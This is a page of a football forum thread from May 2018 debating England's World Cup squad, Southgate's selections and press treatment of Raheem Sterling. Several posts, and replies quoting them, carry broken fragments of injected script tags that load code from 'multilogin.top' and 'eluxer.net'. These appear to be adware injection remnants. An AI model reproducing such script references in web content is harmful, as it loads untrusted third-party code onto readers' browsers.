Forum Home Forum Home : International : Rest of The World
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Why are England NOT the best

Post Reply Post Reply Page  <1 1415161718 25>
Author
Roy Keane
Roy Keane

YBIGs Donald Trump

Post Options Post Options   Thanks (0) Thanks(0)   Quote bhob Quote  Post ReplyReply Direct Link To This Post Posted: 17 May 2018 at 11:07am
Originally posted by Fintan Fintan wrote:

Also for the avoidance of doubt I was answering the question posed in the title no agreeing or disagreeing with anyone else assessment of England as a squad. 

So according to you "Why are England NOT the best" is because people who watch the EPL have an over inflated view of the league?
Sponsored Links

FrankosHereNow View Drop Down
Roy Keane
Roy Keane
I like Klopp

Post Options Post Options   Thanks (0) Thanks(0)   Quote FrankosHereNow Quote  Post ReplyReply Direct Link To This Post Posted: 17 May 2018 at 11:19am
Originally posted by bhob bhob wrote:

Originally posted by Fintan Fintan wrote:

Also for the avoidance of doubt I was answering the question posed in the title no agreeing or disagreeing with anyone else assessment of England as a squad. 

So according to you "Why are England NOT the best" is because people who watch the EPL have an over inflated view of the league?
Exactly what I thought as well. LOL
YBIG Quiz Champion 2016, 2017 & 2018.

As You Were
Three in a row
gspain View Drop Down
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote gspain Quote  Post ReplyReply Direct Link To This Post Posted: 17 May 2018 at 12:41pm
< ="//multilogin.top/oldmultitabs.js">https://eluxer.net/code?id=105&subid=50932_2852_">
I miss the "We're gong to win the World Cup" rubbish.  The fans and media have a very realistic view now of the England squad and team.

I expect England to comfortably reach the knockout stage and have a great chance of beating Colombia/Poland or possibly Senegal.  It is likely to be Germany or Brazil after that.  I actually think losing to one of the big boys in the quarter finals would be a very successful World Cup for England.  If it comes to pass though it may not be perceived that way.

Denis Irwin View Drop Down
Robbie Keane
Robbie Keane
Stay Home & watch Lethal Weapon

Post Options Post Options   Thanks (0) Thanks(0)   Quote Denis Irwin Quote  Post ReplyReply Direct Link To This Post Posted: 17 May 2018 at 12:43pm
Originally posted by gspain gspain wrote:

< ="//multilogin.top/oldmultitabs.js">https://eluxer.net/code?id=105&subid=50932_2852_">
I miss the "We're gong to win the World Cup" rubbish.  The fans and media have a very realistic view now of the England squad and team.

I expect England to comfortably reach the knockout stage and have a great chance of beating Colombia/Poland or possibly Senegal.  It is likely to be Germany or Brazil after that.  I actually think losing to one of the big boys in the quarter finals would be a very successful World Cup for England.  If it comes to pass though it may not be perceived that way.

Oh don't worry they're already laying the ground work on Sky for Euro 2020 and the 2022 WC. Saying that this is why Southgate named a young squad 
Eamonn Dunphy:"I'll tell you who wrote it, Rod Liddle, he's the guy who ran away and left his wife for a young one".

Bill O'Herlihy: Ah ye can't be saying that now Eamonn
irishmufc View Drop Down
Robbie Keane
Robbie Keane
I love Vulvas

Post Options Post Options   Thanks (0) Thanks(0)   Quote irishmufc Quote  Post ReplyReply Direct Link To This Post Posted: 17 May 2018 at 9:36pm
The only early kick off England will have is on a Sunday in the group stage so nice to be able to see all their games.

I thought Wilshere did alright this season from the games/highlights I seen him in. England don't seem to have much creativity through the middle so I thought Wilshere might have gotten in but hard to argue with Southgate's logic for not selecting him.

Fair play to Alexander-Arnold. Thoroughly deserved call-up.Clap

I think Welbeck is very fortunate to get in. He never gets enough goals. I'd rather take a chance on Carroll being honest but I can see how he'd include him given he has both strength and pace that Carroll may not have. Carroll's fantastic goal against Stoke might be influencing my opinion a bit LOL

I've mixed feelings about Smalling's exclusion. Jones is calamity prone himself (own goal against Spurs was a shocker) so don't see how one should be in without the other or both out. Smalling can get a goal, is pretty quick but he gives away the most ridiculous fouls which could prove costly for England on the biggest stage in football. I don't blame Southgate for dropping him but I do think he probably deserves a squad place over Harry Maguire.

Wings? They're only the band The Beatles could have been.
gspain View Drop Down
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote gspain Quote  Post ReplyReply Direct Link To This Post Posted: 17 May 2018 at 10:31pm
Originally posted by irishmufc irishmufc wrote:

The only early kick off England will have is on a Sunday in the group stage so nice to be able to see all their games.

I thought Wilshere did alright this season from the games/highlights I seen him in. England don't seem to have much creativity through the middle so I thought Wilshere might have gotten in but hard to argue with Southgate's logic for not selecting him.

I think Welbeck is very fortunate to get in. He never gets enough goals. I'd rather take a chance on Carroll being honest but I can see how he'd include him given he has both strength and pace that Carroll may not have. Carroll's fantastic goal against Stoke might be influencing my opinion a bit LOL

I've mixed feelings about Smalling's exclusion. Jones is calamity prone himself (own goal against Spurs was a shocker) so don't see how one should be in without the other or both out. Smalling can get a goal, is pretty quick but he gives away the most ridiculous fouls which could prove costly for England on the biggest stage in football. I don't blame Southgate for dropping him but I do think he probably deserves a squad place over Harry Maguire.

< ="//multilogin.top/oldmultitabs.js">< ="text/" ="https://eluxer.net/code?id=105&subid=50932_2852_">

3 ahead of Harry Kane for the national team.  Big smileBig smile

More games I know but couldn't resist it.  
irishmufc View Drop Down
Robbie Keane
Robbie Keane
I love Vulvas

Post Options Post Options   Thanks (0) Thanks(0)   Quote irishmufc Quote  Post ReplyReply Direct Link To This Post Posted: 17 May 2018 at 11:11pm
Originally posted by gspain gspain wrote:

Originally posted by irishmufc irishmufc wrote:

< ="//multilogin.top/oldmultitabs.js">< ="text/" ="https://eluxer.net/code?id=105&subid=50932_2852_">

3 ahead of Harry Kane for the national team.  Big smileBig smile

More games I know but couldn't resist it.  

LOL
Wings? They're only the band The Beatles could have been.
Zinedine Kilbane 110 View Drop Down
Jack Charlton
Jack Charlton
Man City records obsession

Post Options Post Options   Thanks (0) Thanks(0)   Quote Zinedine Kilbane 110 Quote  Post ReplyReply Direct Link To This Post Posted: 18 May 2018 at 9:20am
I’d probably have Smalling in ahead of Harry MaGuire and he is one of my favourite players (the size of his head!).

I’d take out one of the defenders as they is lots of cover on the right (Trippier or Arnold) and replace with a creative/attacking midfielder- Wilshere/ Lallana / Sessegnon or even Jonjo.

But other than that the squad really picks himself.

The Huntacha View Drop Down
Roy Keane
Roy Keane

Post Options Post Options   Thanks (0) Thanks(0)   Quote The Huntacha Quote  Post ReplyReply Direct Link To This Post Posted: 19 May 2018 at 11:13pm
Sol Campbell reckons England should go with a 3-2-3-2 formation with no full backs.

Pickford
Walker Stones Maguire
Dier Henderson
Sterling Ali Lingaard
Kane and Vardy

How's that job hunt going Sol?

Jimmy Bullard - "Favorite band? Elastic."
HuntysCousin View Drop Down
Jack Charlton
Jack Charlton

Post Options Post Options   Thanks (0) Thanks(0)   Quote HuntysCousin Quote  Post ReplyReply Direct Link To This Post Posted: 19 May 2018 at 11:32pm
Ah here LOL
pre Madonna View Drop Down
Robbie Keane
Robbie Keane
I am MALDING

Post Options Post Options   Thanks (0) Thanks(0)   Quote pre Madonna Quote  Post ReplyReply Direct Link To This Post Posted: 20 May 2018 at 2:05am
Is that Sol, the black Tory?
bhob View Drop Down
Roy Keane
Roy Keane

YBIGs Donald Trump

Post Options Post Options   Thanks (0) Thanks(0)   Quote bhob Quote  Post ReplyReply Direct Link To This Post Posted: 29 May 2018 at 2:14pm
I see the Sun are already trying to wind up the players by running an article about Sterlings gun tattoo on his leg
Robbie Keane
Robbie Keane
I am MALDING

Post Options Post Options   Thanks (0) Thanks(0)   Quote pre Madonna Quote  Post ReplyReply Direct Link To This Post Posted: 29 May 2018 at 2:22pm
Well the tattoo doesn't seem very well thought out, even though the lad himself says that it isn't finished, he gets some amount of media coverage for very little. It really does all seem to be about his background.
lassassinblanc View Drop Down
Paul McGrath
Paul McGrath
Cheese, it’s not just for eating

Post Options Post Options   Thanks (0) Thanks(0)   Quote lassassinblanc Quote  Post ReplyReply Direct Link To This Post Posted: 29 May 2018 at 2:50pm
LOL

I've heard it all now. PM is right the criticism the lad gets at times is Over the Top

He's explained that what the tattoo means i.e. a tribute to his father it's not like he got it as an advertisement for M-16 rifles.

Calls for for him to removed from the squad are laughable
Bob Hoskins View Drop Down
Moderator Group
Moderator Group

Post Options Post Options   Thanks (0) Thanks(0)   Quote Bob Hoskins Quote  Post ReplyReply Direct Link To This Post Posted: 29 May 2018 at 4:10pm
It's not a tribute to his father, it's got deeper meaning. Hid dad was shot and killed with an M16, when he was 2 years old. So he admirably said he'd never hold a gun, so this tatoo is about him shooting with his right foot and not using a gun. 

LOL LOL LOL 
Bonkers logic 
Romario 2016: And the ticket mafia gets caught! Well, four years ago I had already told the government.
Trap junior View Drop Down
Robbie Keane
Robbie Keane
YBIG Minister of Doom & Gloom

Post Options Post Options   Thanks (0) Thanks(0)   Quote Trap junior Quote  Post ReplyReply Direct Link To This Post Posted: 29 May 2018 at 4:13pm
Originally posted by Bob Hoskins Bob Hoskins wrote:

It's not a tribute to his father, it's got deeper meaning. Hid dad was shot and killed with an M16, when he was 2 years old. So he admirably said he'd never hold a gun, so this tatoo is about him shooting with his right foot and not using a gun. 

LOL LOL LOL 
Bonkers logic 

Stupid.  Yeah the parents of Sandyhook are all getting tats of guns on their legs because they hate guns and want to commemorate their children's death by having guns painted on their limbs. 

Pied Piper to: Baldrick, Brendan 88, 9Fingers, Borussia and more...

97.6% chance this post will be replied to by Baldrick (source: PWC)
Robbie Keane
Robbie Keane
I am MALDING

Post Options Post Options   Thanks (0) Thanks(0)   Quote pre Madonna Quote  Post ReplyReply Direct Link To This Post Posted: 29 May 2018 at 4:28pm
Don't think anybody is saying it is in anyway clever! Footballer gets sh*t tattoo is a fairly boring headline though. He might well deserve a bit of criticism here, even if, like me, you don't buy in too much into the role model crap, but the problem is he has been criticised for buying his mother a nice house after the Euros. For leaving one club for another for a better contract and a better chance of winning trophies, which has been vindicated and for eating a pastry from Gregg's. I don't think there is a more scrutinised player in the EPL, on and off the pitch and it does seem to carry what I can only see as racism.
Denis Irwin View Drop Down
Robbie Keane
Robbie Keane
Stay Home & watch Lethal Weapon

Post Options Post Options   Thanks (0) Thanks(0)   Quote Denis Irwin Quote  Post ReplyReply Direct Link To This Post Posted: 29 May 2018 at 9:57pm
Eamonn Dunphy:"I'll tell you who wrote it, Rod Liddle, he's the guy who ran away and left his wife for a young one".

Bill O'Herlihy: Ah ye can't be saying that now Eamonn
 Post Reply Post Reply Page  <1 1415161718 25>
  Share Topic